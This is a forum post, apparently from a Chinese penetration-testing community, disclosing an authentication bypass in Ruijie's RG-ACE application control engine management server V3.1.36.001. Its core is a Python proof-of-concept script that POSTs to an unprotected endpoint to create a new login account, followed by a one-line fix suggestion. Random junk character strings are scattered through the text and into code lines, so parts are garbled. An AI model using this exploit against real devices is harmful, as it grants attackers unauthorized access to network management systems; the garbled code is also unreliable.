中国网络渗透测试联盟

标题: 锐捷应用控制引擎管理服务器可以增加用户 [打印本页]

---

作者: admin    时间: 2012-12-10 10:16
标题: 锐捷应用控制引擎管理服务器可以增加用户
锐捷应用控制引擎管理服务器（RG-ACE系列应用控制引擎管理服务器V3.1.36.001，官网的连接 http://www.ruijie.com.cn/service/down-search.aspx 显示是最新版）可以根据没有权限验证的接口直接增加用户，连接设备，查看设备信息和报表（权限相对于默认的admin比较低）

1 _+ ?! }! w* Z; j/ b
测试的具体版本是
) d5 g( p0 M; {3 X' K3 D( O9 d' D, r产品名称: 锐捷应用控制引擎
版本号: 3.1.36.001 TC
& V3 R4 k3 ~8 I6 l2 n编译时间: 201104291730

8 k( g% {/ p2 d
漏洞证明：



& c9 A' }' ~& K; ~3 I9 y* r
4 H* Z7 E+ l7 u( t- Z' ^  l' g  e  C

执行脚本
#! /usr/bin/env python
2 l+ e& g. q# i  c#coding=gbk
#RG-ACE管理服务器 V3.1.36.001
0 s% X$ G6 Z9 J0 ?$ I8 fimport urllib2, urllib,cookielib
url=r'http://IP/mars/doInsertUserInfo.do' #IP改为装这个软件的IP
opener=urllib2.build_opener(urllib2.HTTPCookieProcessor(cookielib.CookieJar()))
opener.addheaders = [('User-agent','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)')]
! G4 X: n  l* `- Ppost=(("event","userManager.doInsertUserInfo"),
2 ^7 b" g. ^3 o( X4 z("useractionname","addButtonValue"),
("useropermanager","userManager"),
("userName","t"), #######账号自己加
("pwd","aaaaaa"),######密码自己加
("trueName","ad"),
/ ]/ \" V7 p. G" J("email",""),
9 ~% e3 ]7 w6 ?1 |9 k8 S( K3 V7 V("mobilePhone",""),
) [) r1 r" G* }' d("officePhone",""),
("addr",""),
("submit","确定"))
7 V- N, B( I% W1 Q* w! j4 L* Q3 q; `! Uurllib2.install_opener(opener)
* a* N4 {, G0 l" n: Mp=urllib2.urlopen(url, urllib.urlencode(post)).read()
, R: O! J* f( z, u1 \print "Done"

* w2 V7 d; A9 n登录，连接设备





! {0 Q4 J$ F" D默认的管理员admin权限更大点



/ G; z5 r) l9 j1 V" P# ^

, z" c% Q% t4 Y! Z修复方案：
加强对接口的权限验证
5 m- E' x) s7 O$ E
, M7 D) r! ~" ~% E# ]

---

欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)

Powered by Discuz! X3.2